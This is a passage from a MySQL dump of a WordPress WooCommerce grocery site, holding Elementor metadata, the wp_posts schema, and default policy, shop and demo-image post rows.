Slab\";}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(12437,1373,'_elementor_css','a:6:{s:4:\"time\";i:1670394368;s:5:\"fonts\";a:1:{i:0;s:4:\"Itim\";}s:5:\"icons\";a:2:{i:0;s:0:\"\";i:10;s:9:\"fa-brands\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(12438,1804,'_elementor_css','a:6:{s:4:\"time\";i:1670682834;s:5:\"fonts\";a:1:{i:0;s:4:\"Itim\";}s:5:\"icons\";a:2:{i:0;s:0:\"\";i:5;s:9:\"fa-brands\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(12439,1816,'_elementor_css','a:6:{s:4:\"time\";i:1672376937;s:5:\"fonts\";a:1:{i:0;s:4:\"Itim\";}s:5:\"icons\";a:2:{i:0;s:0:\"\";i:5;s:9:\"fa-brands\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(12440,1626,'_elementor_css','a:6:{s:4:\"time\";i:1678228191;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:0:\"\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(12441,1802,'_elementor_css','a:7:{s:4:\"time\";i:1678233570;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(12442,1333,'_elementor_css','a:6:{s:4:\"time\";i:1678471046;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(12443,1350,'_elementor_css','a:6:{s:4:\"time\";i:1678520279;s:5:\"fonts\";a:1:{i:0;s:17:\"Saira Stencil One\";}s:5:\"icons\";a:1:{i:0;s:0:\"\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(12444,2042,'_edit_last','1'),(12445,2042,'_ca_handle','0'),(12446,2042,'_ca_duration','a:2:{s:5:\"count\";s:1:\"0\";s:4:\"unit\";s:3:\"day\";}'),(12447,2042,'_ca_caps','a:0:{}'),(12448,2042,'_ca_default_access','1'),(12449,2042,'_ca_admin_access','1'),(12450,2042,'_edit_lock','1679987910:1'),(12451,1804,'arm_access_plan','0'),(12453,1804,'arm_access_plan','-2'),(12454,2051,'_edit_lock','1679991158:1'),(12455,2051,'_edit_last','1'),(12460,1373,'_oembed_a3964e9af94b1cb4b3baa0c983a59635','{{unknown}}'),(12461,1234,'wpforms_entries_count_previous_week','a:3:{i:0;i:6;i:1;i:0;i:2;i:0;}');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`),
  KEY `type_status_author` (`post_type`,`post_status`,`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=2062 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (1,1,'2022-01-24 07:19:21','2022-01-24 07:19:21','<!-- wp:paragraph -->\n<p>Welcome to WordPress. This is your first post. Edit or delete it, then start writing!</p>\n<!-- /wp:paragraph -->','Hello world!','','publish','open','open','','hello-world','','','2022-01-24 07:19:21','2022-01-24 07:19:21','',0,'https://www.mangomitra.in/?p=1',0,'post','',1),(3,1,'2022-01-24 07:19:21','2022-01-24 07:19:21','<!-- wp:heading --><h2>Who we are</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Our website address is: https://www.mangomitra.in.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Comments</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor&#8217;s IP address and browser user agent string to help spam detection.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Media</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Cookies</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select &quot;Remember Me&quot;, your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Embedded content from other websites</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Who we share your data with</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you request a password reset, your IP address will be included in the reset email.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>How long we retain your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>What rights you have over your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Where we send your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Visitor comments may be checked through an automated spam detection service.</p><!-- /wp:paragraph -->','Privacy Policy','','draft','closed','open','','privacy-policy','','','2022-01-24 07:19:21','2022-01-24 07:19:21','',0,'https://www.mangomitra.in/?page_id=3',0,'page','',0),(5,1,'2022-01-24 07:43:17','2022-01-24 07:43:17','[wcmp_vendor]','Vendor Dashboard','','publish','closed','closed','','dashboard','','','2022-01-24 07:43:17','2022-01-24 07:43:17','',0,'https://www.mangomitra.in/?page_id=5',0,'page','',0),(7,1,'2022-01-24 07:43:17','2022-01-24 07:43:17','','woocommerce-placeholder','','inherit','open','closed','','woocommerce-placeholder','','','2022-01-24 07:43:17','2022-01-24 07:43:17','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/woocommerce-placeholder.png',0,'attachment','image/png',0),(8,1,'2022-01-24 07:43:18','2022-01-24 07:43:18','','Shop','','publish','closed','closed','','shop','','','2022-01-24 07:43:18','2022-01-24 07:43:18','',0,'https://www.mangomitra.in/?page_id=8',0,'page','',0),(9,1,'2022-01-24 07:43:18','2022-01-24 07:43:18','<!-- wp:shortcode -->[woocommerce_cart]<!-- /wp:shortcode -->','Cart','','publish','closed','closed','','cart','','','2022-01-24 07:43:18','2022-01-24 07:43:18','',0,'https://www.mangomitra.in/?page_id=9',0,'page','',0),(10,1,'2022-01-24 07:43:18','2022-01-24 07:43:18','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[woocommerce_checkout]\n<!-- /wp:shortcode -->','Checkout','','publish','closed','closed','','checkout','','','2022-03-08 17:06:21','2022-03-08 11:36:21','',0,'https://www.mangomitra.in/?page_id=10',0,'page','',0),(11,1,'2022-01-24 07:43:18','2022-01-24 07:43:18','<!-- wp:shortcode -->\n[woocommerce_my_account]\n<!-- /wp:shortcode -->','My account','','publish','closed','closed','','my-account','','','2022-02-17 16:45:18','2022-02-17 11:15:18','',0,'https://www.mangomitra.in/?page_id=11',0,'page','',0),(12,1,'2022-01-24 07:43:18','0000-00-00 00:00:00','<!-- wp:paragraph -->\n<p><b>This is a sample page.</b></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<h3>Overview</h3>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Our refund and returns policy lasts 30 days. If 30 days have passed since your purchase, we can’t offer you a full refund or exchange.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To be eligible for a return, your item must be unused and in the same condition that you received it. It must also be in the original packaging.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Several types of goods are exempt from being returned. Perishable goods such as food, flowers, newspapers or magazines cannot be returned. We also do not accept products that are intimate or sanitary goods, hazardous materials, or flammable liquids or gases.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Additional non-returnable items:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n<li>Gift cards</li>\n<li>Downloadable software products</li>\n<li>Some health and personal care items</li>\n</ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To complete your return, we require a receipt or proof of purchase.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please do not send your purchase back to the manufacturer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are certain situations where only partial refunds are granted:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n<li>Book with obvious signs of use</li>\n<li>CD, DVD, VHS tape, software, video game, cassette tape, or vinyl record that has been opened.</li>\n<li>Any item not in its original condition, is damaged or missing parts for reasons not due to our error.</li>\n<li>Any item that is returned more than 30 days after delivery</li>\n</ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<h2>Refunds</h2>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Once your return is received and inspected, we will send you an email to notify you that we have received your returned item. We will also notify you of the approval or rejection of your refund.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are approved, then your refund will be processed, and a credit will automatically be applied to your credit card or original method of payment, within a certain amount of days.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<b>Late or missing refunds</b>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you haven’t received a refund yet, first check your bank account again.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Then contact your credit card company, it may take some time before your refund is officially posted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Next contact your bank. There is often some processing time before a refund is posted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you’ve done all of this and you still have not received your refund yet, please contact us at {email address}.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<b>Sale items</b>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Only regular priced items may be refunded. Sale items cannot be refunded.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<h2>Exchanges</h2>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We only replace items if they are defective or damaged. If you need to exchange it for the same item, send us an email at {email address} and send your item to: {physical address}.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<h2>Gifts</h2>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If the item was marked as a gift when purchased and shipped directly to you, you’ll receive a gift credit for the value of your return. Once the returned item is received, a gift certificate will be mailed to you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If the item wasn’t marked as a gift when purchased, or the gift giver had the order shipped to themselves to give to you later, we will send a refund to the gift giver and they will find out about your return.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<h2>Shipping returns</h2>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To return your product, you should mail your product to: {physical address}.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You will be responsible for paying for your own shipping costs for returning your item. Shipping costs are non-refundable. If you receive a refund, the cost of return shipping will be deducted from your refund.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Depending on where you live, the time it may take for your exchanged product to reach you may vary.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are returning more expensive items, you may consider using a trackable shipping service or purchasing shipping insurance. We don’t guarantee that we will receive your returned item.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<h2>Need help?</h2>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Contact us at {email} for questions related to refunds and returns.</p>\n<!-- /wp:paragraph -->','Refund and Returns Policy','','draft','closed','closed','','refund_returns','','','2022-01-24 07:43:18','0000-00-00 00:00:00','',0,'https://www.mangomitra.in/?page_id=12',0,'page','',0),(13,1,'2022-01-24 07:48:38','2022-01-24 07:48:38','','One Click Demo Import - log_file_2022-01-24__07-48-38','','inherit','open','closed','','one-click-demo-import-log_file_2022-01-24__07-48-38','','','2022-01-24 07:48:38','2022-01-24 07:48:38','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/log_file_2022-01-24__07-48-38.txt',0,'attachment','text/plain',0),(14,1,'2020-06-01 10:27:48','2020-06-01 10:27:48','','woocommerce-placeholder','','inherit','open','closed','','woocommerce-placeholder-2','','','2020-06-01 10:27:48','2020-06-01 10:27:48','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/woocommerce-placeholder.png',0,'attachment','image/png',0),(105,1,'2020-06-02 08:24:29','2020-06-02 08:24:29','','download-app-footer-image','','inherit','open','closed','','download-app-footer-image','','','2020-06-02 08:24:29','2020-06-02 08:24:29','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/download-app-footer-image.png',0,'attachment','image/png',0),(148,1,'2020-06-02 11:26:45','2020-06-02 11:26:45','','organic--cucumber','','inherit','open','closed','','organic-cucumber','','','2020-06-02 11:26:45','2020-06-02 11:26:45','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/organic-cucumber.png',0,'attachment','image/png',0),(171,1,'2020-06-03 05:13:48','2020-06-03 05:13:48','','organicc-apples','','inherit','open','closed','','organicc-apples','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/organicc-apples.png',0,'attachment','image/png',0),(173,1,'2020-06-03 05:22:22','2020-06-03 05:22:22','','organicc-banana','','inherit','open','closed','','organicc-banana','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/organicc-banana.png',0,'attachment','image/png',0),(174,1,'2020-06-03 05:25:36','2020-06-03 05:25:36','','organicc-cheeries\'','','inherit','open','closed','','organicc-cheeries','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/organicc-cheeries.png',0,'attachment','image/png',0),(175,1,'2020-06-03 05:28:47','2020-06-03 05:28:47','','organicc-grapes','','inherit','open','closed','','organicc-grapes','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/organicc-grapes.png',0,'attachment','image/png',0),(176,1,'2020-06-03 05:33:56','2020-06-03 05:33:56','','organicc-tomatoes','','inherit','open','closed','','organicc-tomatoes','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/organicc-tomatoes.png',0,'attachment','image/png',0),(177,1,'2020-06-03 05:35:59','2020-06-03 05:35:59','','organicc-potatoes','','inherit','open','closed','','organicc-potatoes','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/organicc-potatoes.png',0,'attachment','image/png',0),(178,1,'2020-06-03 05:37:52','2020-06-03 05:37:52','','organicc-peas','','inherit','open','closed','','organicc-peas','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/organicc-peas.png',0,'attachment','image/png',0),(180,1,'2020-06-03 05:44:30','2020-06-03 05:44:30','','organicc-green-chillies','','inherit','open','closed','','organicc-green-chillies','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/organicc-green-chillies.png',0,'attachment','image/png',0),(182,1,'2020-06-03 08:23:01','2020-06-03 08:23:01','','organicc-brocolli','','inherit','open','closed','','organicc-brocolli','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/organicc-brocolli.png',0,'attachment','image/png',0),(184,1,'2020-06-03 08:25:05','2020-06-03 08:25:05','','organicc-capcicum','','inherit','open','closed','','organicc-capcicum','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/organicc-capcicum.png',0,'attachment','image/png',0),(186,1,'2020-06-03 08:31:57','2020-06-03 08:31:57','','organicc-lettuce','','inherit','open','closed','','organicc-lettuce','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/organicc-lettuce.png',0,'attachment','image/png',0),(187,1,'2020-06-03 08:33:37','2020-06-03 08:33:37','','organicc-corn','','inherit','open','closed','','organicc-corn','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/organicc-corn.png',0,'attachment','image/png',0),(189,1,'2020-06-03 10:33:47','2020-06-03 10:33:47','','Minereal-water','','inherit','open','closed','','minereal-water','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/Minereal-water.png',0,'attachment','image/png',0),(191,1,'2020-06-03 10:38:38','2020-06-03 10:38:38','','cold-drinks','','inherit','open','closed','','cold-drinks-2','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/cold-drinks.png',0,'attachment','image/png',0),(193,1,'2020-06-03 10:43:18','2020-06-03 10:43:18','','fruit-juices','','inherit','open','closed','','fruit-juices','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/fruit-juices.png',0,'attachment','image/png',0),(195,1,'2020-06-03 10:49:55','2020-06-03 10:49:55','','butter-&amp;-cheese','','inherit','open','closed','','butter-cheese-2','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/butter-cheese.png',0,'attachment','image/png',0),(197,1,'2020-06-03 10:55:32','2020-06-03 10:55:32','','cakes-&amp;-patries','','inherit','open','closed','','cakes-patries','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/cakes-patries.png',0,'attachment','image/png',0),(198,1,'2020-06-03 10:59:56','2020-06-03 10:59:56','','milk-products','','inherit','open','closed','','milk-products-2','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/milk-products.png',0,'attachment','image/png',0),(201,1,'2020-06-03 11:14:28','2020-06-03 11:14:28','','Ice-Cream-Novelties','','inherit','open','closed','','ice-cream-novelties-2','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/Ice-Cream-Novelties.png',0,'attachment','image/png',0),(205,1,'2020-06-03 11:37:43','2020-06-03 11:37:43','','dal-&amp;-pulses','','inherit','open','closed','','dal-pulses-2','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/dal-pulses.png',0,'attachment','image/png',0),(207,1,'2020-06-03 11:41:08','2020-06-03 11:41:08','','Dry-fruits','','inherit','open','closed','','dry-fruits-2','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/Dry-fruits.png',0,'attachment','image/png',0),(212,1,'2020-06-03 11:53:16','2020-06-03 11:53:16','','Masala-&amp;-Spices','','inherit','open','closed','','masala-spices-2','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/Masala-Spices.png',0,'attachment','image/png',0),(213,1,'2020-06-03 11:55:50','2020-06-03 11:55:50','','Edible-oil-&amp;-ghee','','inherit','open','closed','','edible-oil-ghee-2','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/Edible-oil-ghee.png',0,'attachment','image/png',0),(215,1,'2020-06-03 12:01:10','2020-06-03 12:01:10','','Rice','','inherit','open','closed','','rice','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/Rice.png',0,'attachment','image/png',0),(217,1,'2020-06-03 12:18:34','2020-06-03 12:18:34','','Sugar-&amp;-salt','','inherit','open','closed','','sugar-salt','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/Sugar-salt.png',0,'attachment','image/png',0),(219,1,'2020-06-03 12:23:05','2020-06-03 12:23:05','','bath-&amp;-handwash','','inherit','open','closed','','bath-handwash-2','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/bath-handwash.png',0,'attachment','image/png',0),(221,1,'2020-06-03 12:27:45','2020-06-03 12:27:45','','Fragrances-&amp;-Deos','','inherit','open','closed','','fragrances-deos-2','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/Fragrances-Deos.png',0,'attachment','image/png',0),(223,1,'2020-06-03 12:32:36','2020-06-03 12:32:36','','Hair-Care','','inherit','open','closed','','hair-care-2','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/Hair-Care.png',0,'attachment','image/png',0),(225,1,'2020-06-03 12:36:29','2020-06-03 12:36:29','','skin-care','','inherit','open','closed','','skin-care-2','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/skin-care.png',0,'attachment','image/png',0),(227,1,'2020-06-03 12:39:36','2020-06-03 12:39:36','','makeup','','inherit','open','closed','','makeup','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/makeup.png',0,'attachment','image/png',0),(229,1,'2020-06-03 12:51:49','2020-06-03 12:51:49','','medicine','','inherit','open','closed','','medicine','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/medicine.png',0,'attachment','image/png',0),(231,1,'2020-06-03 12:59:44','2020-06-03 12:59:44','','pet-food','','inherit','open','closed','','pet-food-2','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/pet-food.png',0,'attachment','image/png',0),(233,1,'2020-06-03 13:01:42','2020-06-03 13:01:42','','pet-shampoo','','inherit','open','closed','','pet-shampoo','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/pet-shampoo.png',0,'attachment','image/png',0),(236,1,'2020-06-04 05:14:54','2020-06-04 05:14:54','','meat','','inherit','open','closed','','meat','','','2020-06-04 05:14:54','2020-06-04 05:14:54','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/meat.png',0,'attachment','image/png',0),(238,1,'2020-06-04 05:18:24','2020-06-04 05:18:24','','salt-&amp;-sugar','','inherit','open','closed','','salt-sugar-2','','','2020-06-04 05:18:24','2020-06-04 05:18:24','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/salt-sugar.png',0,'attachment','image/png',0),(239,1,'2020-06-04 05:18:39','2020-06-04 05:18:39','','seafood','','inherit','open','closed','','seafood','','','2020-06-04 05:18:39','2020-06-04 05:18:39','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/seafood.png',0,'attachment','image/png',0),(252,1,'2020-06-04 06:00:41','2020-06-04 06:00:41','<!-- wp:heading {\"level\":3} -->\n<h3>The standard Lorem Ipsum passage, used since the 1500s</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>\"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Section 1.10.32 of \"de Finibus Bonorum et Malorum\", written by Cicero in 45 BC</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>\"Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem 